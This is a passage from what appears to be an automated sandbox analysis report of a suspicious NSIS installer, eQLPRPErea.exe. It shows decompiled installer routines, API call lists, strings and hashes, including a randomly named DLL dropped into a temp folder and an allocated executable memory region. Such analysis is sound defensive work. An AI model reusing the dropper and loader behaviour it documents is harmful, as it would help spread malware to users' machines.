							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E0040568C(0x42f440, _t102 + 4, 0x40);
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E0040311B( *0x414c50);
					if(E004030E9( &_v12, 4) == 0 || _v16 != _v12) {
						goto L33;
					} else {
						goto L31;
					}
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x42f42c) & 0x00007e00) + 0x200;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030E9(0x420c58, _t92); // executed
						if(_t79 == 0) {
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						if( *0x42f42c != 0) {
							if((_a4 & 0x00000002) == 0) {
								if(_v8 == 0) {
									if(GetTickCount() > _t97) {
										_v8 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405D18(0);
								}
							}
							goto L22;
						}
						E0040568C( &_v48, 0x420c58, 0x1c);
						_t94 = _v48;
						if((_t94 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
							_t89 = _v24;
							if(_t89 > _t101) {
								goto L33;
							}
							_a4 = _a4 | _t94;
							_t95 =  *0x414c50; // 0x7c00
							 *0x42f42c = _t95;
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t24 = _t89 - 4; // 0x1c
								_t101 = _t24;
								if(_t92 > _t101) {
									_t92 = _t101;
								}
								goto L22;
							} else {
								break;
							}
						}
						L22:
						if(_t101 <  *0x428c58) {
							_v16 = E00405D4B(_v16, 0x420c58, _t92);
						}
						 *0x414c50 =  *0x414c50 + _t92;
						_t101 = _t101 - _t92;
					} while (_t101 > 0);
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}

0x00402c42
0x00402c45
0x00402c4b
0x00402c4e
0x00402c51
0x00402c64
0x00402c6a
0x00402c7d
0x00402c82
0x00402c85
0x00402c8b
0x00000000
0x00402c8d
0x00402c98
0x00402ca0
0x00402ca8
0x00402cad
0x00402caf
0x00402dde
0x00402de6
0x00000000
0x00000000
0x00402deb
0x00402e0f
0x00402e1a
0x00402e25
0x00402e2a
0x00402e2d
0x00402e2e
0x00402e2f
0x00402e31
0x00402e39
0x00402e5e
0x00402e64
0x00402e66
0x00402e66
0x00402e72
0x00402e79
0x00402e7e
0x00402e80
0x00402e80
0x00402e88
0x00402e88
0x00402e8b
0x00402e8c
0x00402e8c
0x00402e8f
0x00402e91
0x00402e91
0x00402e9b
0x00402ea1
0x00402eaf
0x00000000
0x00402eb4
0x00402e3c
0x00000000
0x00402e3c
0x00402df3
0x00402e05
0x00000000
0x00000000
0x00000000
0x00000000
0x00402cb5
0x00402cb5
0x00402cba
0x00402cbe
0x00402cc5
0x00402ccc
0x00402cce
0x00402cce
0x00402cd6
0x00402cdd
0x00402e4d
0x00402e52
0x00402e52
0x00402e42
0x00000000
0x00402e42
0x00402ceb
0x00402d70
0x00402d75
0x00402d87
0x00402da3
0x00402da3
0x00402d77
0x00402d78
0x00402d78
0x00402d75
0x00000000
0x00402d70
0x00402cf8
0x00402cfd
0x00402d06
0x00402d38
0x00402d3d
0x00000000
0x00000000
0x00402d43
0x00402d46
0x00402d50
0x00402d56
0x00402d5e
0x00402d61
0x00402d61
0x00402d66
0x00402d68
0x00402d68
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d56
0x00402da6
0x00402dac
0x00402dbc
0x00402dbc
0x00402dbf
0x00402dc5
0x00402dc7
0x00402dd3
0x00402dd8
0x00402dd8
0x00000000
0x00402dd3

APIs

GetTickCount.KERNEL32 ref: 00402C45
GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402C6A

Part of subcall function 004056AC: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
Part of subcall function 004056AC: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2

GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402CA0
DestroyWindow.USER32(00000000,00420C58,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402DD8
GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402E14

Strings

Error launching installer, xrefs: 00402C8D
C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
Null, xrefs: 00402D2F
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
soft, xrefs: 00402D26
The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
Inst, xrefs: 00402D19
verifying installer: %d%%, xrefs: 00402D89
"C:\Users\user\Desktop\eQLPRPErea.exe" , xrefs: 00402C41
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
String ID: "C:\Users\user\Desktop\eQLPRPErea.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
API String ID: 2181728824-2718184032
Opcode ID: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
Instruction ID: c463052a9c5fa83953bbfa6958f4efa241c8f41de6c5b3e58a45a606a63aebe6
Opcode Fuzzy Hash: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
Instruction Fuzzy Hash: D561BE70A00214ABDB21AFA5DE49B9F7BB4BF14714F60813BE900B62D1D7B89D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EBD, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 176
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t72;
				long _t75;
				intOrPtr _t80;
				long _t81;
				void* _t83;
				int _t85;
				void* _t98;
				void* _t101;
				long _t102;
				signed int _t103;
				long _t104;
				int _t105;
				intOrPtr _t106;
				long _t107;
				void* _t108;

				_t103 = _a16;
				_t98 = _a12;
				_v12 = _t103;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x418c58;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E0040311B( *0x42f478 + _t66);
				}
				_t68 = E004030E9( &_a16, 4); // executed
				if(_t68 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 == 0) {
							while(_a16 > 0) {
								_t104 = _v12;
								if(_a16 < _t104) {
									_t104 = _a16;
								}
								if(E004030E9(0x414c58, _t104) == 0) {
									goto L34;
								} else {
									_t72 = WriteFile(_a8, 0x414c58, _t104,  &_a12, 0); // executed
									if(_t72 == 0 || _t104 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t69);
										return _t69;
									} else {
										_v8 = _v8 + _t104;
										_a16 = _a16 - _t104;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t103) {
							_t103 = _a16;
						}
						if(E004030E9(_t98, _t103) != 0) {
							_v8 = _t103;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t75 = GetTickCount();
					 *0x40b57c =  *0x40b57c & 0x00000000;
					 *0x40b578 =  *0x40b578 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b060 = 8;
					 *0x414c08 = 0x40cc00;
					 *0x414c04 = 0x40cc00;
					 *0x414c00 = 0x414c00;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t105 = 0x4000;
						if(_a16 < 0x4000) {
							_t105 = _a16;
						}
						if(E004030E9(0x414c58, _t105) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t105;
						 *0x40b050 = 0x414c58;
						 *0x40b054 = _t105;
						while(1) {
							_t101 = _v16;
							 *0x40b058 = _t101;
							 *0x40b05c = _v12;
							_t80 = E00405DB9("DTA");
							_v28 = _t80;
							if(_t80 < 0) {
								break;
							}
							_t106 =  *0x40b058; // 0x41a058
							_t107 = _t106 - _t101;
							_t81 = GetTickCount();
							_t102 = _t81;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t81 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t108 = _t108 + 0xc;
								E00404D7E(0,  &_v92);
								_v20 = _t102;
							}
							if(_t107 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t107;
									_v8 = _v8 + _t107;
									_t83 =  *0x40b058; // 0x41a058
									_v16 = _t83;
									if(_v12 < 1) {
										goto L45;
									}
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t85 = WriteFile(_a8, _v16, _t107,  &_v24, 0); // executed
								if(_t85 == 0 || _v24 != _t107) {
									goto L29;
								} else {
									_v8 = _v8 + _t107;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402ec5
0x00402ec9
0x00402ecc
0x00402ed1
0x00402ed3
0x00402ed3
0x00402eda
0x00402ede
0x00402ee3
0x00402ee5
0x00402ee5
0x00402eec
0x00402ef1
0x00402efc
0x00402efc
0x00402f07
0x00402f0e
0x00403094
0x00403094
0x00000000
0x00402f14
0x00402f18
0x0040307f
0x004030d4
0x00403099
0x0040309f
0x004030a1
0x004030a1
0x004030b2
0x00000000
0x004030b4
0x004030bf
0x004030c7
0x00403079
0x00403079
0x00403096
0x00403096
0x00000000
0x004030ce
0x004030ce
0x004030d1
0x00000000
0x004030d1
0x004030c7
0x004030b2
0x004030df
0x00000000
0x004030df
0x00403084
0x00403086
0x00403086
0x00403092
0x004030dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00403092
0x00402f24
0x00402f26
0x00402f2d
0x00402f34
0x00402f34
0x00402f3b
0x00402f43
0x00402f4d
0x00402f52
0x00402f5a
0x00402f64
0x00402f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f6d
0x00402f6d
0x00402f6d
0x00402f75
0x00402f77
0x00402f77
0x00402f88
0x00000000
0x00000000
0x00402f8e
0x00402f91
0x00402f97
0x00402f9d
0x00402f9d
0x00402fa8
0x00402fae
0x00402fb3
0x00402fba
0x00402fbd
0x00000000
0x00000000
0x00402fc3
0x00402fc9
0x00402fcb
0x00402fd4
0x00402fd6
0x00403004
0x0040300a
0x00403013
0x00403018
0x00403018
0x0040301f
0x0040306d
0x00000000
0x00000000
0x00000000
0x00403021
0x00403024
0x00403046
0x00403049
0x0040304c
0x00403055
0x00403058
0x00000000
0x00000000
0x0040305e
0x00403062
0x00000000
0x00000000
0x00000000
0x00403068
0x00403032
0x0040303a
0x00000000
0x00403041
0x00403041
0x00000000
0x00403041
0x0040303a
0x0040301f
0x00403075
0x00000000
0x00403075
0x00000000
0x00402f6d

APIs

GetTickCount.KERNEL32 ref: 00402F24
GetTickCount.KERNEL32 ref: 00402FCB
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FF4
wsprintfA.USER32 ref: 00403004
WriteFile.KERNELBASE(00000000,00000000,0041A058,7FFFFFFF,00000000), ref: 00403032

Strings

DTA, xrefs: 00402F91, 00402FA3
... %d%%, xrefs: 00402FFE
XLA, xrefs: 00402F7A
XLA, xrefs: 004030A4

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$DTA$XLA$XLA
API String ID: 4209647438-4060474872
Opcode ID: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
Instruction ID: 2a52969f5c244c71cf6e7afafcf32ff1ac156de72fa387f0f3f6be643268eac5
Opcode Fuzzy Hash: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
Instruction Fuzzy Hash: 9761817190121ADBDF10DF65DA44AAF7BB8EB04356F10813BE910B72D4D7789E40CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405554(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054E8(E004059DB(0x409c40, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E004059DB();
				}
				E00405C17(0x409c40);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405CB0(0x409c40);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c40); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c40, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E004056AC(0x409c40, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D7E(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E004059DB(0x40a440, 0x430000);
						E004059DB(0x430000, 0x409c40);
						E004059FD(_t77, 0x40a440, 0x409c40, "C:\Users\jones\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059DB(0x430000, 0x40a440);
						_t62 = E004052DB("C:\Users\jones\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  *0x42f4a8 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404D7E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7E(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_t43 = E00402EBD( *((intOrPtr*)(_t87 - 0x1c)),  *(_t87 - 8), _t77, _t77); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c40);
					E004052DB();
					goto L29;
				}
				goto L33;
			}

0x0040179d
0x004017a4
0x004017ad
0x004017b0
0x004017b3
0x004017b8
0x004017c0
0x004017dc
0x004017c2
0x004017c2
0x004017c3
0x004017c3
0x004017e2
0x004017ec
0x004017ec
0x004017f0
0x004017f3
0x004017f8
0x004017fa
0x004017fc
0x00401801
0x00401801
0x0040180c
0x0040180c
0x0040181d
0x0040181f
0x0040181f
0x00401820
0x00401820
0x00401823
0x00401826
0x00401829
0x0040182f
0x0040182f
0x00401833
0x00401833
0x0040183b
0x0040184a
0x0040184f
0x00401852
0x00401855
0x00000000
0x00000000
0x00401857
0x0040185a
0x004018b4
0x004018b9
0x004015ca
0x004026da
0x004026da
0x0040292f
0x00402932
0x00402932
0x00000000
0x0040185c
0x00401862
0x0040186d
0x0040187a
0x00401885
0x0040189b
0x0040189b
0x0040189e
0x00000000
0x004018a4
0x004018a4
0x004018a5
0x004018c2
0x00402938
0x00402938
0x00402938
0x004018a7
0x004018a7
0x004018a8
0x00401495
0x00402293
0x00402293
0x00402293
0x004018a5
0x0040189e
0x0040293a
0x0040293e
0x0040293e
0x004018d2
0x004018d7
0x004018e5
0x004018ea
0x004018f0
0x004018f4
0x004018f6
0x004018fe
0x0040190a
0x004018f8
0x004018f8
0x004018fc
0x00000000
0x00000000
0x004018fc
0x00401913
0x00401919
0x0040191b
0x00000000
0x00401921
0x00401921
0x00401924
0x0040193c
0x00401926
0x00401929
0x00401932
0x00401932
0x00401941
0x00401946
0x0040228e
0x00000000
0x0040228e
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
CompareFileTime.KERNEL32(-00000014,?,YVfgfgfgfgfg,YVfgfgfgfgfg,00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
GetFileAttributesA.KERNELBASE(YVfgfgfgfgfg,YVfgfgfgfgfg,00000000,00000000,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
SetFileAttributesA.KERNELBASE(YVfgfgfgfgfg,00000000), ref: 00401833

Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,arability Setup,NSIS Error), ref: 004059E8

Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,73BCEA30), ref: 00404DDA
Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A

Strings

YVfgfgfgfgfg, xrefs: 004017B9, 004017C2, 004017CF, 004017E1, 004017F2, 00401828, 00401832, 00401849, 00401867, 004018A7, 00401928, 00401931, 0040193B, 00401946
C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll, xrefs: 00401875, 00401891
C:\Users\user\AppData\Local\Temp, xrefs: 004017CA

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll$YVfgfgfgfgfg
API String ID: 1152937526-694924065
Opcode ID: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
Instruction ID: cdaedd3c6a5390e1bf503350d98347a993321a7ff473c6b68b0c18fdf3b675ae
Opcode Fuzzy Hash: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
Instruction Fuzzy Hash: 69419172900519BBCB11BBA5CD46EAF36A9EF05329B20423BF511F11E1D67C4A41CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 029111E1, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 341memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 029114F8
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02911557

Strings

d28d64ee68fb4a8eb7ba3d00512d296f, xrefs: 029115C4, 029115C7

Memory Dump Source

Source File: 00000001.00000002.704501869.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: d28d64ee68fb4a8eb7ba3d00512d296f
API String ID: 1475775534-3011780682
Opcode ID: 61f7465483c0d3347b81c0c05dabae7132cabbe0f2343931d8bc9b8bada7673d
Instruction ID: 010dc52201f37cb11fd39f7979ca5ca73d70a743168b5b2130b71eaeb4b1a2d1
Opcode Fuzzy Hash: 61f7465483c0d3347b81c0c05dabae7132cabbe0f2343931d8bc9b8bada7673d
Instruction Fuzzy Hash: BBE14B35D5438CEEEF21DBE4DC05BEDBBB6AF04711F10409AE608BA1A1D7B50A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0291070F, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02910811
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 029109DE

Memory Dump Source

Source File: 00000001.00000002.704501869.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69edf1f60cf3f7593567da81f34f7c070dc7a2f222ebb339bb867568812a015
Instruction ID: c1a4e37d4a9e169cc295cdc96c1f78a0ec610e8bf5079bc29dc04402a6fe3cd5
Opcode Fuzzy Hash: c69edf1f60cf3f7593567da81f34f7c070dc7a2f222ebb339bb867568812a015
Instruction Fuzzy Hash: B3A1E034D0020DEFEF10DBE5C995BADBBB2BF18315F20445AEA15BA2A0D3765A90DF11

Uniqueness

Uniqueness Score: -1.00%

Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040557B(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E00405513(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059DB("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015d5
0x004015dc
0x004015e6
0x004015e8
0x004015ee
0x004015f6
0x004015fc
0x004015fe
0x00401601
0x00401609
0x00401616
0x00401623
0x00401623
0x00401618
0x00401619
0x00401621
0x00000000
0x00000000
0x00401621
0x00401616
0x00401626
0x00401629
0x0040162b
0x0040162c
0x004015ee
0x00401633
0x00401653
0x004021e8
0x00401635
0x00401637
0x00401642
0x00401648
0x00401648
0x00402932
0x0040293e

APIs

Part of subcall function 0040557B: CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00405589
Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040558E
Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040559D

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
